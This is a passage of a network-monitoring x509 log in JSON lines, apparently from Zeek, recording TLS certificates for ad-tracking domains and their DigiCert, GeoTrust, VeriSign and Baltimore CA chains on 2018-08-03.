Inc,C=US","certificate.not_valid_before":"2012-10-03T07:00:00.000000Z","certificate.not_valid_after":"2015-10-08T19:00:00.000000Z","certificate.key_alg":"rsaEncryption","certificate.sig_alg":"sha1WithRSAEncryption","certificate.key_type":"rsa","certificate.key_length":2048,"certificate.exponent":"65537","san.dns":["*.agkn.com","agkn.com"],"basic_constraints.ca":false} +{"ts":"2018-08-03T23:39:01.168537Z","id":"FsLlE346YU6QhgvY0c","certificate.version":3,"certificate.serial":"0A5F114D035B179117D2EFD4038C3F3B","certificate.subject":"CN=DigiCert High Assurance CA-3,OU=www.digicert.com,O=DigiCert Inc,C=US","certificate.issuer":"CN=DigiCert High Assurance EV Root CA,OU=www.digicert.com,O=DigiCert Inc,C=US","certificate.not_valid_before":"2008-04-02T19:00:00.000000Z","certificate.not_valid_after":"2022-04-03T07:00:00.000000Z","certificate.key_alg":"rsaEncryption","certificate.sig_alg":"sha1WithRSAEncryption","certificate.key_type":"rsa","certificate.key_length":2048,"certificate.exponent":"65537","basic_constraints.ca":true,"basic_constraints.path_len":0} +{"ts":"2018-08-03T23:39:01.168537Z","id":"Fg99083vmsyvKkh0G","certificate.version":3,"certificate.serial":"0B701DDAFCB25BDE8531430903014C55","certificate.subject":"CN=pix.bit.ly,O=bitly\u005c, Inc.,L=New York,ST=New York,C=US","certificate.issuer":"CN=DigiCert SHA2 High Assurance Server CA,OU=www.digicert.com,O=DigiCert Inc,C=US","certificate.not_valid_before":"2015-04-07T07:00:00.000000Z","certificate.not_valid_after":"2017-05-17T19:00:00.000000Z","certificate.key_alg":"rsaEncryption","certificate.sig_alg":"sha256WithRSAEncryption","certificate.key_type":"rsa","certificate.key_length":2048,"certificate.exponent":"65537","san.dns":["pix.bit.ly"],"basic_constraints.ca":false} +{"ts":"2018-08-03T23:39:01.168537Z","id":"FI19bl3IVztqKpv9B3","certificate.version":3,"certificate.serial":"04E1E7A4DC5CF2F36DC02B42B85D159F","certificate.subject":"CN=DigiCert SHA2 High Assurance Server CA,OU=www.digicert.com,O=DigiCert Inc,C=US","certificate.issuer":"CN=DigiCert High Assurance EV Root CA,OU=www.digicert.com,O=DigiCert Inc,C=US","certificate.not_valid_before":"2013-10-22T19:00:00.000000Z","certificate.not_valid_after":"2028-10-22T19:00:00.000000Z","certificate.key_alg":"rsaEncryption","certificate.sig_alg":"sha256WithRSAEncryption","certificate.key_type":"rsa","certificate.key_length":2048,"certificate.exponent":"65537","basic_constraints.ca":true,"basic_constraints.path_len":0} +{"ts":"2018-08-03T23:39:01.149170Z","id":"FqakIA3Ud4rmNSNbG5","certificate.version":3,"certificate.serial":"023A79","certificate.subject":"CN=GeoTrust SSL CA - G4,O=GeoTrust Inc.,C=US","certificate.issuer":"CN=GeoTrust Global CA,O=GeoTrust Inc.,C=US","certificate.not_valid_before":"2014-09-09T03:41:10.000000Z","certificate.not_valid_after":"2022-05-21T03:41:10.000000Z","certificate.key_alg":"rsaEncryption","certificate.sig_alg":"sha256WithRSAEncryption","certificate.key_type":"rsa","certificate.key_length":2048,"certificate.exponent":"65537","basic_constraints.ca":true,"basic_constraints.path_len":0} +{"ts":"2018-08-03T23:39:01.159128Z","id":"FoX2eiK7A8XVN8pVh","certificate.version":3,"certificate.serial":"0C089AEB077DF4B7137F1099AE84F755DB49DE24","certificate.subject":"CN=*.scorecardresearch.com,OU=OSE,O=TMRG\u005c, Inc.,L=Reston,ST=VA,C=US","certificate.issuer":"CN=Verizon Akamai SureServer CA G14-SHA1,OU=Cybertrust,O=Verizon Enterprise Solutions,L=Amsterdam,C=NL","certificate.not_valid_before":"2014-10-16T04:04:12.000000Z","certificate.not_valid_after":"2015-10-16T04:04:07.000000Z","certificate.key_alg":"rsaEncryption","certificate.sig_alg":"sha1WithRSAEncryption","certificate.key_type":"rsa","certificate.key_length":2048,"certificate.exponent":"65537","san.dns":["*.scorecardresearch.com"],"basic_constraints.ca":false} +{"ts":"2018-08-03T23:39:01.159128Z","id":"F6SM0I15vuGRqLUqE8","certificate.version":3,"certificate.serial":"0727A46A","certificate.subject":"CN=Verizon Akamai SureServer CA G14-SHA1,OU=Cybertrust,O=Verizon Enterprise Solutions,L=Amsterdam,C=NL","certificate.issuer":"CN=Baltimore CyberTrust Root,OU=CyberTrust,O=Baltimore,C=IE","certificate.not_valid_before":"2014-04-02T21:32:45.000000Z","certificate.not_valid_after":"2021-04-02T21:31:39.000000Z","certificate.key_alg":"rsaEncryption","certificate.sig_alg":"sha1WithRSAEncryption","certificate.key_type":"rsa","certificate.key_length":2048,"certificate.exponent":"65537","basic_constraints.ca":true,"basic_constraints.path_len":2} +{"ts":"2018-08-03T23:39:01.159128Z","id":"FQeCO91FhTF64znivk","certificate.version":3,"certificate.serial":"07278EED","certificate.subject":"CN=Baltimore CyberTrust Root,OU=CyberTrust,O=Baltimore,C=IE","certificate.issuer":"CN=GTE CyberTrust Global Root,OU=GTE CyberTrust Solutions\u005c, Inc.,O=GTE Corporation,C=US","certificate.not_valid_before":"2012-04-18T23:36:18.000000Z","certificate.not_valid_after":"2018-08-13T23:35:17.000000Z","certificate.key_alg":"rsaEncryption","certificate.sig_alg":"sha1WithRSAEncryption","certificate.key_type":"rsa","certificate.key_length":2048,"certificate.exponent":"65537","basic_constraints.ca":true,"basic_constraints.path_len":3} +{"ts":"2018-08-03T23:39:01.150772Z","id":"FeslrD4qPtQqP5LyOd","certificate.version":3,"certificate.serial":"190000093679AFBDCE4EAA0718000100000936","certificate.subject":"CN=rad.msn.com,OU=Microsoft Corporation,O=Microsoft Corporation,L=Redmond,ST=WA,C=US","certificate.issuer":"CN=Microsoft IT SSL SHA1,OU=Microsoft IT,O=Microsoft Corporation,L=Redmond,ST=Washington,C=US","certificate.not_valid_before":"2014-10-14T03:05:56.000000Z","certificate.not_valid_after":"2016-10-13T03:05:56.000000Z","certificate.key_alg":"rsaEncryption","certificate.sig_alg":"sha1WithRSAEncryption","certificate.key_type":"rsa","certificate.key_length":2048,"certificate.exponent":"65537","san.dns":["rad.msn.com","rad.live.com","rad.microsoft.com","rad.atdmt.com","rpt.rad.msn.com","rad.rad.msn.com","blkrpt.rad.msn.com","blkrad.rad.msn.com","bar.rad.msn.com","a.rad.msn.com","b.rad.msn.com","a.rad.atdmt.com","b.rad.atdmt.com","rpt.rad.atdmt.com","bar.rad.atdmt.com","blkrpt.rad.atdmt.com","rad.rad.atdmt.com","blkrad.rad.atdmt.com","rpt.msn.com","rpt.atdmt.com"]} +{"ts":"2018-08-03T23:39:01.150772Z","id":"FTc20s2HJpDNZNwbQ6","certificate.version":3,"certificate.serial":"0727AA46","certificate.subject":"CN=Microsoft IT SSL SHA1,OU=Microsoft IT,O=Microsoft Corporation,L=Redmond,ST=Washington,C=US","certificate.issuer":"CN=Baltimore CyberTrust Root,OU=CyberTrust,O=Baltimore,C=IE","certificate.not_valid_before":"2014-05-08T00:00:06.000000Z","certificate.not_valid_after":"2018-05-07T23:59:24.000000Z","certificate.key_alg":"rsaEncryption","certificate.sig_alg":"sha1WithRSAEncryption","certificate.key_type":"rsa","certificate.key_length":2048,"certificate.exponent":"65537","basic_constraints.ca":true,"basic_constraints.path_len":0} +{"ts":"2018-08-03T23:39:01.166082Z","id":"FEbyRb1pcTUgT14Jxd","certificate.version":3,"certificate.serial":"1F6AAF787FE640ABBC314A3DEBE434A7","certificate.subject":"CN=na.gmtdmp.com,OU=TechOps,O=Media Innovation Group\u005c, LLC,L=New York,ST=New York,C=US","certificate.issuer":"CN=VeriSign Class 3 Secure Server CA - G3,OU=Terms of use at https://www.verisign.com/rpa (c)10,OU=VeriSign Trust Network,O=VeriSign\u005c, Inc.,C=US","certificate.not_valid_before":"2014-10-15T07:00:00.000000Z","certificate.not_valid_after":"2015-10-17T06:59:59.000000Z","certificate.key_alg":"rsaEncryption","certificate.sig_alg":"sha1WithRSAEncryption","certificate.key_type":"rsa","certificate.key_length":2048,"certificate.exponent":"65537","san.dns":["na.gmtdmp.com","gmtdmp.mookie1.com"],"basic_constraints.ca":false} +{"ts":"2018-08-03T23:39:01.166082Z","id":"F0ycGZ2X6t2bjfE77k","certificate.version":3,"certificate.serial":"6ECC7AA5A7032009B8CEBCF4E952D491","certificate.subject":"CN=VeriSign Class 3 Secure Server CA - G3,OU=Terms of use at https://www.verisign.com/rpa (c)10,OU=VeriSign Trust Network,O=VeriSign\u005c, Inc.,C=US","certificate.issuer":"CN=VeriSign Class 3 Public Primary Certification Authority - G5,OU=(c) 2006 VeriSign\u005c, Inc. - For authorized use only,OU=VeriSign Trust Network,O=VeriSign\u005c, Inc.,C=US","certificate.not_valid_before":"2010-02-08T08:00:00.000000Z","certificate.not_valid_after":"2020-02-08T07:59:59.000000Z","certificate.key_alg":"rsaEncryption","certificate.sig_alg":"sha1WithRSAEncryption","certificate.key_type":"rsa","certificate.key_length":2048,"certificate.exponent":"65537","basic_constraints.ca":true,"basic_constraints.path_len":0} +{"ts":"2018-08-03T23:39:01.166082Z","id":"FwZxHaTosC5HMTFQ2","certificate.version":3,"certificate.serial":"250CE8E030612E9F2B89F7054D7CF8FD","certificate.subject":"CN=VeriSign Class 3 Public Primary Certification Authority - G5,OU=(c) 2006 VeriSign\u005c, Inc. - For authorized use only,OU=VeriSign Trust Network,O=VeriSign\u005c, Inc.,C=US","certificate.issuer":"OU=Class 3 Public Primary Certification Authority,O=VeriSign\u005c, Inc.,C=US","certificate.not_valid_before":"2006-11-08T08:00:00.000000Z","certificate.not_valid_after":"2021-11-08T07:59:59.000000Z","certificate.key_alg":"rsaEncryption","certificate.sig_alg":"sha1WithRSAEncryption","certificate.key_type":"rsa","certificate.key_length":2048,"certificate.exponent":"65537","basic_constraints.ca":true} +{"ts":"2018-08-03T23:39:01.166295Z","id":"FyfBmE1uxR4LPQiiwg","certificate.version":3,"certificate.serial":"0236D1","certificate.subject":"CN=RapidSSL CA,O=GeoTrust\u005c, Inc.,C=US","certificate.issuer":"CN=GeoTrust Global CA,O=GeoTrust Inc.,C=US","certificate.not_valid_before":"2010-02-20T06:45:05.000000Z","certificate.not_valid_after":"2020-02-19T06:45:05.000000Z","certificate.key_alg":"rsaEncryption","certificate.sig_alg":"sha1WithRSAEncryption","certificate.key_type":"rsa","certificate.key_length":2048,"certificate.exponent":"65537","basic_constraints.ca":true,"basic_constraints.path_len":0} +{"ts":"2018-08-03T23:39:01.166295Z","id":"F8Wvj82UfJkQXp14pg","certificate.version":3,"certificate.serial":"12BBE6","certificate.subject":"CN=GeoTrust Global CA,O=GeoTrust Inc.,C=US","certificate.issuer":"OU=Equifax Secure Certificate Authority,O=Equifax,C=US","certificate.not_valid_before":"2002-05-21T11:00:00.000000Z","certificate.not_valid_after":"2018-08-21T11:00:00.000000Z","certificate.key_alg":"rsaEncryption","certificate.sig_alg":"sha1WithRSAEncryption","certificate.key_type":"rsa","certificate.key_length":2048,"certificate.exponent":"65537","basic_constraints.ca":true} +{"ts":"2018-08-03T23:39:01.156487Z","id":"FlwjH1VX5WGZwfNA","certificate.version":3,"certificate.serial":"67FBBC6F0001000077AF","certificate.subject":"CN=flex.msn.com,OU=Adcenter,O=Microsoft,L=Redmond,ST=WA,C=US","certificate.issuer":"CN=MSIT Machine Auth CA 2,DC=redmond,DC=corp,DC=microsoft,DC=com","certificate.not_valid_before":"2013-06-06T00:09:06.000000Z","certificate.not_valid_after":"2015-06-06T00:09:06.000000Z","certificate.key_alg":"rsaEncryption","certificate.sig_alg":"sha1WithRSAEncryption","certificate.key_type":"rsa","certificate.key_length":2048,"certificate.exponent":"65537"} +{"ts":"2018-08-03T23:39:01.156487Z","id":"F0T1T52YtVLugdWEA9","certificate.version":3,"certificate.serial":"615DAAD2000600000040","certificate.subject":"CN=MSIT Machine Auth CA 2,DC=redmond,DC=corp,DC=microsoft,DC=com","certificate.issuer":"CN=Microsoft Internet Authority","certificate.not_valid_before":"2012-05-16T03:40:55.000000Z","certificate.not_valid_after":"2016-05-16T03:50:55.000000Z","certificate.key_alg":"rsaEncryption","certificate.sig_alg":"sha1WithRSAEncryption","certificate.key_type":"rsa","certificate.key_length":2048,"certificate.exponent":"65537","basic_constraints.ca":true,"basic_constraints.path_len":0} +{"ts":"2018-08-03T23:39:01.156487Z","id":"FTDJXw3B9FNH6LllVi","certificate.version":3,"certificate.serial":"07276FAE","certificate.subject":"CN=Microsoft Internet Authority","certificate.issuer":"CN=Baltimore CyberTrust Root,OU=CyberTrust,O=Baltimore,C=IE","certificate.not_valid_before":"2012-04-26T00:41:36.000000Z","certificate.not_valid_after":"2020-04-26T00:40:55.000000Z","certificate.key_alg":"rsaEncryption","certificate.sig_alg":"sha1WithRSAEncryption","certificate.key_type":"rsa","certificate.key_length":4096,"certificate.exponent":"65537","basic_constraints.ca":true,"basic_constraints.path_len":1} +{"ts":"2018-08-03T23:39:01.156487Z","id":"FnbDjP2vdfoNORnLy9","certificate.version":3,"certificate.serial":"0809E169141E080784D177C649586BFA","certificate.subject":"CN=*.ib-ibi.com,OU=IT,O=I-Behavior\u005c, Inc,L=Louisville,ST=Colorado,C=US","certificate.issuer":"CN=DigiCert High Assurance CA-3,OU=www.digicert.com,O=DigiCert Inc,C=US","certificate.not_valid_before":"2013-09-27T07:00:00.000000Z","certificate.not_valid_after":"2016-11-30T20:00:00.000000Z","certificate.key_alg":"rsaEncryption","certificate.sig_alg":"sha1WithRSAEncryption","certificate.key_type":"rsa","certificate.key_length":2048,"certificate.exponent":"65537","san.dns":["*.ib-ibi.com","ib-ibi.com"],"basic_constraints.ca":false} +{"ts":"2018-08-03T23:39:01.156487Z","id":"FAuQnh411Poc4j6IB5","certificate.version":3,"certificate.serial":"0851F959814145CABDE024E212C9C20E","certificate.subject":"CN=DigiCert High Assurance CA-3,OU=www.digicert.com,O=DigiCert Inc,C=US","certificate.issuer":"CN=DigiCert High Assurance EV Root CA,OU=www.digicert.com,O=DigiCert Inc,C=US","certificate.not_valid_before":"2007-04-03T07:00:00.000000Z","certificate.not_valid_after":"2022-04-03T07:00:00.000000Z","certificate.key_alg":"rsaEncryption","certificate.sig_alg":"sha1WithRSAEncryption","certificate.key_type":"rsa","certificate.key_length":2048,"certificate.exponent":"65537","basic_constraints.ca":true}